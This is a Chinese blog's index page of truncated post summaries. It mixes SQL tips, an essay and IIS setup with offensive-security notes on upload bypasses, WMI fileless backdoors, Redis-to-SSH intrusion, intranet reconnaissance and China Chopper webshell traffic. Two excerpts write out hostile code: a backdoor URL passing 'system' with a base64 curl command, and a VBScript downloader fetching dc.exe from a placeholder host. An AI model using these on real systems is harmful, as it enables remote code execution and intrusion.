anything的博客

摘要： 如何高效查询表的总记录数?[总结-整理-马克]首先想到的自然是在表主键上应用COUNT函数来查询了,这个是目前使用最多的方法,没有之一SELECT COUNT(1) ROWS FROM product这里再给出一些其它方法,这些方法或多或少会有一些限制,或者看起来不是那么"完美",但依然有一定的借鉴... 阅读全文

摘要： 转自独自等待博客早上逛乌云发现了PKAV大牛的一篇文章，针对php和windows文件上传的分析，思路很YD，果断转之与大家分享。虽然此文可能有许多的限制条件，但是如果你认真阅读会发现，其实还是比较实用的。另外一篇团长发的pdf中也涉及到了相关的文章，是国外的nosec发布的，英文的，感兴趣的同学在... 阅读全文

摘要： 作者：咪蒙，来源：咪蒙（mimeng7）我说过，我的情绪分为高兴、很高兴和非常高兴。每一个跟我相处过的人，都觉得像我这种24小时脸都笑烂了的傻逼，肯定是从出生到现在就一帆风顺，人生最大挫折就是眼睫毛又掉了两根吧？等他们看到我写的《我的爸爸，要结婚了》，都觉得不可思议。从初中开始，我家就成了狗血剧现场... 阅读全文

摘要： 作者：dean用方法参数 id :需要执行的函数参数catid : 函数的参数(需要用base_64encode函数转一下)例如:http://www.php0.net/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4y... 阅读全文

摘要： Abusing WMI to Build a Persistent, Asynchronous, and Fileless Backdoor滥用 WMI 打造一个永久、异步、无文件后门http://dwz.cn/1fffBI(pdf) #Blackhat2015WMI - Windows Manag... 阅读全文

摘要： 服务器配置不当包括三个部分:1.Redis服务使用ROOT账号启动2.Redis服务无密码认证或者使用的是弱口令进行认证3.服务器开放了SSH服务，而且允许使用密钥登录简单的写下过程测试环境victim server CentOS6.6 192.168.1.11attack server CentO... 阅读全文

摘要： Set xPost = createObject("Microsoft.XMLHTTP")xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址xPost.Send()Set sGet = createObject("ADODB.Stream")... 阅读全文

摘要： 1.收集信息。1-1.无论是什么途径获得的内网机器，确定他在内网后，我们首先就要了解这台机器的所属人员，如果我们的目标是公司，那我们就要了解这个人在公司里的职位，他是个什么身份，有多大的权利，这都关系到他在内网里的权限。因为，作为大公司，一个高权限的人他在内网里所要用到的东西就多，那么相对他的机器，... 阅读全文

摘要： 用了菜刀用了也有一段时间了，感觉挺神奇了，这里做一个小小的探究吧，起始也就是用鲨鱼抓包看看软件是怎么通信实现的，不敢卖弄知识，权当学习笔记了，大神路过呵呵这货就是主界面，环境啥的就随意了，IIS，阿帕奇，阿金科斯都可以，我这里用apache，因为之前搞的是PHP开发，对PHP相对比较熟悉，随机就用P... 阅读全文

摘要： 统：win8环境：vs2012一：安装IIS比较win7的安装来说，多选了几个钩钩，不然会报错，偶就遇到这样的错误。控制面板-》程序和功能-》启动和关闭windows功能，钩钩图例：装好之后在控制面板的管理工具下面有这个打开IIs管理器浏览80端口的网站，会出现如下图片表明安装成功2：发布网站，右击... 阅读全文